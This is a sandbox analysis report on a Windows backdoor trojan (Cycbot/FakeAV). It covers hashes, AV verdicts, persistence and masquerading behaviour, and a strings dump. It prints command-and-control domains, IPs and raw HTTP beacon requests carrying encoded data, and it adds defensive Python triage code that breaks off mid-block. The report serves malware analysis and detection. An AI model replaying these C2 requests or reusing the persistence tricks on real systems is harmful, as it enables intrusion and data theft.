Analysis Date: 2015-01-17 13:44:44
MD5: f151e50d0e7c58612dc5d34486c06932
SHA1: c01f6eae0176db05b4bfa096fdd2d13dab3683f1

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 0a5dffdbf8b9c55fb6d1982b8c7b2a4c sha1: 8829e2c484f629046e967a449ce001cdef80b63d size: 137728
Section .rdata: md5: 84bc70bc0c45ebfd5f01697d1f80bc91 sha1: 52f4359e9379a3d78aed21b0231321dec3869834 size: 2560
Section .data: md5: 015e5cbc62153b3d4fef8c73a978cd0c sha1: c2235a14504dbb0a58d6fb3827b1ca62f6e02560 size: 26112
Section .crt: md5: dbe569613ca1291baa660110f4029db6 sha1: 854818c7e358401bf26ea83d2031fd951f582fc8 size: 512
Timestamp: 2005-11-05 22:05:57
Version: PrivateBuild: 1134
PEhash: 4e2c84ea12979ff37a510849e80d927937f6d3e7
IMPhash: 7b8a3959d1cc2186e57b5e6937fe4d33
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Trojan.Heur.KS.1
AV Authentium: W32/Goolbot.E.gen!Eldorado
AV Avira (antivir): TR/Agent.psa.33
AV BullGuard: Gen:Trojan.Heur.KS.1
AV CA (E-Trust Ino): Win32/FakeSpypro.B!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Agent-139999
AV Dr. Web: Trojan.DownLoader1.62144
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Kryptik.KFV
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/Goolbot.E.gen!Eldorado
AV F-Secure: Trojan-Downloader:W32/Agent.DQLH
AV Grisoft (avg): Cryptic.CCK
AV Ikarus: Gen.Variant.Kazy
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Hoax.Win32.ArchSMS.gen
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.h
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV Rising: Trojan.Win32.Generic.12767F36
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen2
AV Trend Micro: BKDR_CYCBOT.SMIB
AV VirusBlokAda (vba32): Malware-Cryptor.Limpopo

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: offlineservermonitoring.com
Winsock DNS: 127.0.0.1
Winsock DNS: zonere.com
Winsock DNS: zonetk.com
Winsock DNS: rossroadbags.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
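The runtime section above shows the pattern a triage analyst keys on: a Run-key value that points into the user profile, copies dropped under Application Data and Temp with names borrowed from system processes (conhost.exe, dwm.exe, csrss.exe), ProxyEnable switched on, and GUID-style mutex names. The Documents and Settings layout marks the sandbox as Windows XP/2003, where conhost.exe and dwm.exe do not exist as system binaries at all, so those names are pure decoys. The Python below is an added example, not part of this report or of any sandbox: it encodes those observations as rules and runs them over an event list constructed from the report. The Event and Finding types, the rule names, the user-writable directory list and the control event for a legitimate C:\WINDOWS\system32\csrss.exe are this example's own assumptions.

```python
"""Behavioural triage of sandbox events (added example; see lead-in)."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, Optional

# Process names that only legitimately run from %SystemRoot%\System32.  On the
# XP-era sandbox in the report, conhost.exe and dwm.exe do not even exist.
SYSTEM_PROCESS_NAMES = {
    "conhost.exe", "dwm.exe", "csrss.exe", "lsass.exe", "smss.exe",
    "svchost.exe", "winlogon.exe", "services.exe",
}
SYSTEM32 = re.compile(r"^[a-z]:\\windows\\system32\\[^\\]+$", re.IGNORECASE)
# Directories every interactive user can write to (XP and Vista+ layouts); assumption.
USER_WRITABLE = re.compile(
    r"\\(Application Data|Local Settings\\Temp|AppData|Temp)\\", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
PROXY_ENABLE = re.compile(r"\\Internet Settings\\ProxyEnable$", re.IGNORECASE)
# GUID-style mutex names taken from the report, used here as plain IOCs.
KNOWN_MUTEXES = {
    "{A5B35993-9674-43cd-8AC7-5BC5013E617B}", "{C66E79CE-8005-4ed9-A6B1-4983619CB922}",
    "{61B98B86-5F44-42b3-BCA1-33904B067B81}", "{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}",
    "{B37C48AF-B05C-4520-8B38-2FE181D5DC78}",
}


@dataclass(frozen=True)
class Event:
    kind: str                    # "registry", "file", "process" or "mutex"
    name: str                    # value path, file path, image path or mutex name
    value: Optional[str] = None  # registry data, where applicable


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


# Constructed from the Runtime Details above; the last process entry is a
# control for the legitimate location and is not in the report.
SAMPLE_EVENTS = [
    Event("registry", r"HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable", "1"),
    Event("registry", r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost",
          r"C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe"),
    Event("file", r"C:\Documents and Settings\Administrator\Application Data\75DE.FFC"),
    Event("file", r"C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe"),
    Event("process", r"C:\malware.exe"),
    Event("process", r"C:\Documents and Settings\Administrator\Application Data\dwm.exe"),
    Event("process", r"C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe"),
    Event("process", r"C:\WINDOWS\system32\csrss.exe"),
    Event("mutex", "{A5B35993-9674-43cd-8AC7-5BC5013E617B}"),
    Event("mutex", "WininetConnectionMutex"),
]


def triage(events: Iterable[Event]) -> list:
    """Return one Finding per rule hit, in event order."""
    findings = []
    for ev in events:
        if ev.kind == "registry":
            if RUN_KEY.search(ev.name) and ev.value and USER_WRITABLE.search(ev.value):
                findings.append(Finding("run_key_to_user_writable_path", f"{ev.name} -> {ev.value}"))
            elif PROXY_ENABLE.search(ev.name) and ev.value == "1":
                findings.append(Finding("proxy_enabled", ev.name))
        elif ev.kind in ("file", "process"):
            image = ev.name.rsplit("\\", 1)[-1].lower()
            # A system process name is only fine when the image really is in System32.
            if image in SYSTEM_PROCESS_NAMES and not SYSTEM32.match(ev.name):
                findings.append(Finding("system_name_outside_system32", ev.name))
        elif ev.kind == "mutex" and ev.name in KNOWN_MUTEXES:
            findings.append(Finding("known_mutex", ev.name))
    return findings


def rule_counts(events: Iterable[Event]) -> dict:
    """How many times each rule fired; a quick score for the whole run."""
    return dict(Counter(f.rule for f in triage(events)))


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding.rule:32} {finding.detail}")
```

The masquerade rule deliberately keys on the image path rather than the name alone: csrss.exe in System32 is expected, csrss.exe in Local Settings\Temp is not, and the same check catches the Run-key target when it is fed in as a file event.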

Network Details:

DNS: rossroadbags.com (Type: A) ➝ 50.56.218.189
DNS: zonetf.com (Type: A) ➝ 141.8.225.80
DNS: zonetk.com (Type: A)
DNS: offlineservermonitoring.com (Type: A)
DNS: zonere.com (Type: A)
HTTP GET: http://rossroadbags.com/images/p_thumb/3521.jpg?tq=gP4aKydlxIAUQjLd11JEgWF2a0B6hr%2BkFV3LSkv%2BvuszGHEAlVXOlgdKJpido9OfPJqHhwgnAbCWxROt6Hx2P5Jhu5v5IH1XhjsV5fqGs4KkXmzK8yekoISjTNy1Hy60EKGdkZUF7tKHBx7Bz%2FmA22%2F4%2BMy5ummeAm%2BIoFmK0hMm3Ys5mVRyCqZI3f4tFK%2F9dgf8OLo%2Fg9XpADQZedoiUNm8IuL5THP6jguidUjLHo04mbuLj%2Fy40Hw64gzFiFe7ZN1ifIfWxLp7vIP29i3dp%2F%2FrOe454rypIQ7laPiImNBakx6C0uA38dZ4TPj9ehVt4RIRYP2JtYB9N%2F3XPMUw1KIHPc75cQPtx3lQfziBQRzNyZOdXk7ucuUCJsJV5gmT7qZI3hvYViewaoI8Vd%2Bb5wDQLoT6%2F4kGdTsjqBj2FzKPPUscOgkdU5fYb4jO0BRth
User-Agent: iamx/3.11
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 50.56.218.189:80
Flows TCP: 192.168.1.1:1032 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 705f7468   GET /images/p_th
0x00000010 (00016)   756d622f 33353231 2e6a7067 3f74713d   umb/3521.jpg?tq=
0x00000020 (00032)   67503461 4b79646c 78494155 516a4c64   gP4aKydlxIAUQjLd
0x00000030 (00048)   31314a45 67574632 61304236 68722532   11JEgWF2a0B6hr%2
0x00000040 (00064)   426b4656 334c536b 76253242 7675737a   BkFV3LSkv%2Bvusz
0x00000050 (00080)   47484541 6c56584f 6c67644b 4a706964   GHEAlVXOlgdKJpid
0x00000060 (00096)   6f394f66 504a7148 6877676e 41624357   o9OfPJqHhwgnAbCW
0x00000070 (00112)   78524f74 36487832 50354a68 75357635   xROt6Hx2P5Jhu5v5
0x00000080 (00128)   49483158 686a7356 35667147 73344b6b   IH1XhjsV5fqGs4Kk
0x00000090 (00144)   586d7a4b 3879656b 6f49536a 544e7931   XmzK8yekoISjTNy1
0x000000a0 (00160)   48793630 454b4764 6b5a5546 37744b48   Hy60EKGdkZUF7tKH
0x000000b0 (00176)   42783742 7a253246 6d413232 25324634   Bx7Bz%2FmA22%2F4
0x000000c0 (00192)   2532424d 7935756d 6d65416d 25324249   %2BMy5ummeAm%2BI
0x000000d0 (00208)   6f466d4b 30684d6d 33597335 6d565279   oFmK0hMm3Ys5mVRy
0x000000e0 (00224)   43715a49 33663474 464b2532 46396467   CqZI3f4tFK%2F9dg
0x000000f0 (00240)   66384f4c 6f253246 67395870 4144515a   f8OLo%2Fg9XpADQZ
0x00000100 (00256)   65646f69 554e6d38 49754c35 54485036   edoiUNm8IuL5THP6
0x00000110 (00272)   6a677569 64556a4c 486f3034 6d62754c   jguidUjLHo04mbuL
0x00000120 (00288)   6a253246 79343048 77363467 7a466946   j%2Fy40Hw64gzFiF
0x00000130 (00304)   65375a4e 31696649 6657784c 70377649   e7ZN1ifIfWxLp7vI
0x00000140 (00320)   50323969 33647025 32462532 46724f65   P29i3dp%2F%2FrOe
0x00000150 (00336)   34353472 79704951 376c6150 69496d4e   454rypIQ7laPiImN
0x00000160 (00352)   42616b78 36433075 41333864 5a345450   Bakx6C0uA38dZ4TP
0x00000170 (00368)   6a396568 56743452 49525950 324a7459   j9ehVt4RIRYP2JtY
0x00000180 (00384)   42394e25 32463358 504d5577 314b4948   B9N%2F3XPMUw1KIH
0x00000190 (00400)   50633735 63515074 78336c51 667a6942   Pc75cQPtx3lQfziB
0x000001a0 (00416)   51527a4e 795a4f64 586b3775 63755543   QRzNyZOdXk7ucuUC
0x000001b0 (00432)   4a734a56 35676d54 37715a49 33687659   JsJV5gmT7qZI3hvY
0x000001c0 (00448)   56696577 616f4938 56642532 42623577   ViewaoI8Vd%2Bb5w
0x000001d0 (00464)   44514c6f 54362532 46346b47 6454736a   DQLoT6%2F4kGdTsj
0x000001e0 (00480)   71426a32 467a4b50 50557363 4f676b64   qBj2FzKPPUscOgkd
0x000001f0 (00496)   55356659 62346a4f 30425274 68204854   U5fYb4jO0BRth HT
0x00000200 (00512)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000210 (00528)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000220 (00544)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000230 (00560)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000240 (00576)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x00000250 (00592)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a724f65   on: close....rOe
0x00000150 (00336)   34353472 79704951 376c6150 69496d4e   454rypIQ7laPiImN
0x00000160 (00352)   42616b78 36433075 41333864 5a345450   Bakx6C0uA38dZ4TP
0x00000170 (00368)   6a396568 56743452 49525950 324a7459   j9ehVt4RIRYP2JtY
0x00000180 (00384)   42394e25 32463358 504d5577 314b4948   B9N%2F3XPMUw1KIH
0x00000190 (00400)   50633735 63515074 78336c51 667a6942   Pc75cQPtx3lQfziB
0x000001a0 (00416)   51527a4e 795a4f64 586b3775 63755543   QRzNyZOdXk7ucuUC
0x000001b0 (00432)   4a734a56 35676d54 37715a49 33687659   JsJV5gmT7qZI3hvY
0x000001c0 (00448)   56696577 616f4938 56642532 42623577   ViewaoI8Vd%2Bb5w
0x000001d0 (00464)   44514c6f 54362532 46346b47 6454736a   DQLoT6%2F4kGdTsj
0x000001e0 (00480)   71426a32 467a4b50 50557363 4f676b64   qBj2FzKPPUscOgkd
0x000001f0 (00496)   55356659 62346a4f 30425274 68204854   U5fYb4jO0BRth HT
0x00000200 (00512)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000210 (00528)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000220 (00544)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000230 (00560)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000240 (00576)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x00000250 (00592)   2f332e31 310d0a0d 0a                  /3.11....
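Two things about the raw pcap are easy to miss. The GET's tq= value uses the base64 alphabet but, once URL-decoded, is 449 characters long, and 4n+1 characters can never be standard base64, so it is some other encoding and must not be fed to a base64 decoder as if it were. The second dump also continues past the POST's Content-Length: 0 and blank line with bytes identical to the tail of the first dump (from rOe454... through the iamx/3.11 User-Agent), so whatever is parsed from these dumps has to stop at the declared request length. The Python below is an added example, not the sandbox's own code: it rebuilds bytes from the hexdump format used above, parses the request, URL-decodes the query with unquote() rather than parse_qs() (which would turn + into a space), and classifies the blob. DUMP_POST is the second dump copied verbatim and GET_TQ is the GET's tq= value as printed above; the flag names and the 64-character blob threshold are this example's assumptions.

```python
import re
from base64 import b64decode
from urllib.parse import unquote, urlsplit

# Second "Raw Pcap" dump from the report, copied verbatim: offset, hex groups, ASCII.
DUMP_POST = """\
0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a724f65   on: close....rOe
0x00000150 (00336)   34353472 79704951 376c6150 69496d4e   454rypIQ7laPiImN
0x00000160 (00352)   42616b78 36433075 41333864 5a345450   Bakx6C0uA38dZ4TP
0x00000170 (00368)   6a396568 56743452 49525950 324a7459   j9ehVt4RIRYP2JtY
0x00000180 (00384)   42394e25 32463358 504d5577 314b4948   B9N%2F3XPMUw1KIH
0x00000190 (00400)   50633735 63515074 78336c51 667a6942   Pc75cQPtx3lQfziB
0x000001a0 (00416)   51527a4e 795a4f64 586b3775 63755543   QRzNyZOdXk7ucuUC
0x000001b0 (00432)   4a734a56 35676d54 37715a49 33687659   JsJV5gmT7qZI3hvY
0x000001c0 (00448)   56696577 616f4938 56642532 42623577   ViewaoI8Vd%2Bb5w
0x000001d0 (00464)   44514c6f 54362532 46346b47 6454736a   DQLoT6%2F4kGdTsj
0x000001e0 (00480)   71426a32 467a4b50 50557363 4f676b64   qBj2FzKPPUscOgkd
0x000001f0 (00496)   55356659 62346a4f 30425274 68204854   U5fYb4jO0BRth HT
0x00000200 (00512)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000210 (00528)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000220 (00544)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000230 (00560)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000240 (00576)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x00000250 (00592)   2f332e31 310d0a0d 0a                  /3.11....
"""
# The tq= value of the GET request, still URL-encoded, copied from the report above.
GET_TQ = "gP4aKydlxIAUQjLd11JEgWF2a0B6hr%2BkFV3LSkv%2BvuszGHEAlVXOlgdKJpido9OfPJqHhwgnAbCWxROt6Hx2P5Jhu5v5IH1XhjsV5fqGs4KkXmzK8yekoISjTNy1Hy60EKGdkZUF7tKHBx7Bz%2FmA22%2F4%2BMy5ummeAm%2BIoFmK0hMm3Ys5mVRyCqZI3f4tFK%2F9dgf8OLo%2Fg9XpADQZedoiUNm8IuL5THP6jguidUjLHo04mbuLj%2Fy40Hw64gzFiFe7ZN1ifIfWxLp7vIP29i3dp%2F%2FrOe454rypIQ7laPiImNBakx6C0uA38dZ4TPj9ehVt4RIRYP2JtYB9N%2F3XPMUw1KIHPc75cQPtx3lQfziBQRzNyZOdXk7ucuUCJsJV5gmT7qZI3hvYViewaoI8Vd%2Bb5wDQLoT6%2F4kGdTsjqBj2FzKPPUscOgkdU5fYb4jO0BRth"
HEX_GROUP = re.compile(r"^(?:[0-9a-fA-F]{2}){1,4}$")
B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild bytes from the hex groups only; the ASCII column is lossy ('.' hides bytes)."""
    out = bytearray()
    for line in dump.splitlines():
        tokens = line.split()
        if len(tokens) > 2 and tokens[0].startswith("0x"):
            for tok in tokens[2:6]:          # at most four hex groups, then ASCII
                if not HEX_GROUP.match(tok):
                    break
                out += bytes.fromhex(tok)
    return bytes(out)


def parse_request(raw: bytes) -> dict:
    """Request line, headers, decoded query, and any bytes past the declared body."""
    end = raw.index(b"\r\n\r\n")          # ValueError if the header block is incomplete
    lines = raw[:end].decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {k.strip().lower(): v.strip() for k, _, v in (l.partition(":") for l in lines[1:])}
    # unquote() keeps '+' literal; parse_qs() would turn '+' into a space and corrupt base64.
    query = {}
    for pair in urlsplit(target).query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            query[unquote(key)] = unquote(value)
    body_len = int(headers.get("content-length", "0"))
    return {"method": method, "path": urlsplit(target).path, "version": version,
            "headers": headers, "query": query, "trailing": raw[end + 4 + body_len:]}


def classify_blob(value: str) -> dict:
    """Base64 alphabet is necessary, not sufficient: 4n+1 data characters never decode."""
    data = value.rstrip("=")
    charset_ok = bool(B64_ALPHABET.match(value))
    length_ok = charset_ok and len(data) % 4 != 1
    decoded = b64decode(data + "=" * (-len(data) % 4)) if length_ok else None
    return {"charset_ok": charset_ok, "length_ok": length_ok, "decoded": decoded}


def triage_request(raw: bytes) -> dict:
    req = parse_request(raw)
    flags = []
    if not req["headers"].get("user-agent", "").startswith("Mozilla/"):
        flags.append("non_browser_user_agent")            # e.g. iamx/3.11 on the GET
    blobs = {k: classify_blob(v) for k, v in req["query"].items() if len(v) >= 64}
    if blobs:
        flags.append("long_opaque_query_param")
    if req["method"] == "POST" and req["headers"].get("content-length") == "0" and blobs:
        flags.append("post_with_payload_in_query")
    if req["trailing"]:
        flags.append("bytes_beyond_declared_request")     # capture is longer than the request
    return {"request": req, "blobs": blobs, "flags": flags}
```

Usage: triage_request(hexdump_to_bytes(DUMP_POST)) reports the POST with its 160-character tq= value decoding to 119 bytes and 268 trailing bytes that belong to the earlier GET; classify_blob(unquote(GET_TQ)) reports charset_ok but not length_ok, which is the signal to treat the GET blob as opaque rather than as base64.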


Strings
Q
.
@
A
..
040904b0
1134
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
1b2.Rfk
1YJMD=<
/)}4*@
4X0Anw
*[;5:8)
+6)+]-
*6fXbs
[<6h<0@
^6hAe@
`6h^D@
(6h(i@
6i/;X_
6{R#92'
7*i**0
<8&];91
[8/\;M
9i9||p
9'rlho|T
.A/8Di
ADVAPI32.dll
a<R!s=
?atln3
&}aZFv;
B*c&Xjq)
-/Bt8xw
CloseHandle
CoCreateGuid
CoCreateInstance
CoInitialize
CoSetProxyBlanket
CoUninitialize
CreateFileA
d*)2,d
@.data
DeleteCriticalSection
dIK8zJ
ejoB-}
EnterCriticalSection
EnumResourceNamesA
EnumSystemLocalesA
ExitProcess
F6h2Z@
F6hQk@
fbG~lU 
=FYt`"
f*/*zt
GetClassLongA
GetCommandLineA
GetConsoleOutputCP
GetCPInfo
GetCurrentDirectoryW
GetCurrentProcess
GetCurrentThreadId
GetFullPathNameA
GetFullPathNameW
GetLastError
GetLocaleInfoW
GetModuleFileNameW
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetThreadPriority
GetUserDefaultLCID
GetVersionExA
GlobalAlloc
gPCCI	
H6h=G@
h`6hMy@
^,h9.+
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
H|	hwa
hI6hta@
&'+?%I;
InitializeCriticalSection
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
IsValidLocale
j|kX5[="
J})p2o
KERNEL32.dll
</{KkWkE
k.V	jj
L	4-YZ
l_6nJ6
+lA3n#
LCMapStringA
LCMapStringW
LeaveCriticalSection
*l*X:UJ
LyWo)i
}M***=
MessageBoxW
%M IVL
MJ?8Gh
MultiByteToWideChar
m,:|,v1
;)^n.%
/*-_*n
nRP(x?V|S$
NuS{m[
ole32.dll
Oo8I8P
p7}G>4R
pFGTFb
QsW{5!.
Q_sx7r$
RaiseException
`.rdata
R&e;6zZ~
ReadFile
RegCloseKey
RegCreateKeyExW
RegSetValueExW
RPCRT4.dll
RtlUnwind
Ru.c<Ao
SetCommConfig
SetEndOfFile
SetStdHandle
SetUnhandledExceptionFilter
SHCreateDirectoryExW
SHELL32.dll
SHFileOperationW
SHGetFolderPathW
-sKl`5
*sro Ui2
StringFromGUID2
sZ^lkL
T<a6hFE@
Te3-~-l
TerminateProcess
t/F't/-
!This program cannot be run in DOS mode.
ThLoad
Tje6ht
~TP6h	Y@
u$6hnq@
UAebq`
u~i`b9
uJl>IB
UnhandledExceptionFilter
USER32.dll
UuidCreate
veh~.#
V**[[g
V*g/91
v>|Jnd
^?VKMl3
v;pgs2
w71^XM
WideCharToMultiByte
WJ#SQ$
WriteConsoleA
WriteConsoleW
WriteFile
]X$Mpb
Y6hsQ@
y"?tr%
zwN+HG
ZZ~/xD
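The strings above carry the visible import table: registry write APIs (RegCreateKeyExW, RegSetValueExW), shell folder lookup (SHGetFolderPathW, SHCreateDirectoryExW), GUID creation (CoCreateGuid, UuidCreate, StringFromGUID2), IsDebuggerPresent and GetProcAddress, but no WinINet, WinHTTP or Winsock import at all, even though the sandbox recorded DNS lookups, HTTP requests and a WininetConnectionMutex. Either the networking imports are resolved at runtime through GetProcAddress or they belong to a stage that is unpacked in memory; either way the strings understate what the binary does. The Python below is an added example, not part of the report, that turns such a strings dump into a capability summary and reconciles it against observed behaviour. STRINGS holds the DLL and API names from this page; the category names, the networking DLL list and the behaviour labels passed to reconcile() are this example's own.

```python
"""Capability triage from import names found in a strings dump (added example)."""

# DLL and API names taken from the Strings section of the report above.
STRINGS = """
ADVAPI32.dll KERNEL32.dll ole32.dll RPCRT4.dll SHELL32.dll USER32.dll
CloseHandle CoCreateGuid CoCreateInstance CoInitialize CoSetProxyBlanket CoUninitialize
CreateFileA DeleteCriticalSection EnterCriticalSection EnumResourceNamesA EnumSystemLocalesA
ExitProcess GetClassLongA GetCommandLineA GetCurrentDirectoryW GetFullPathNameW
GetModuleFileNameW GetModuleHandleA GetProcAddress GetVersionExA IsDebuggerPresent
MessageBoxW ReadFile RegCloseKey RegCreateKeyExW RegSetValueExW SetCommConfig
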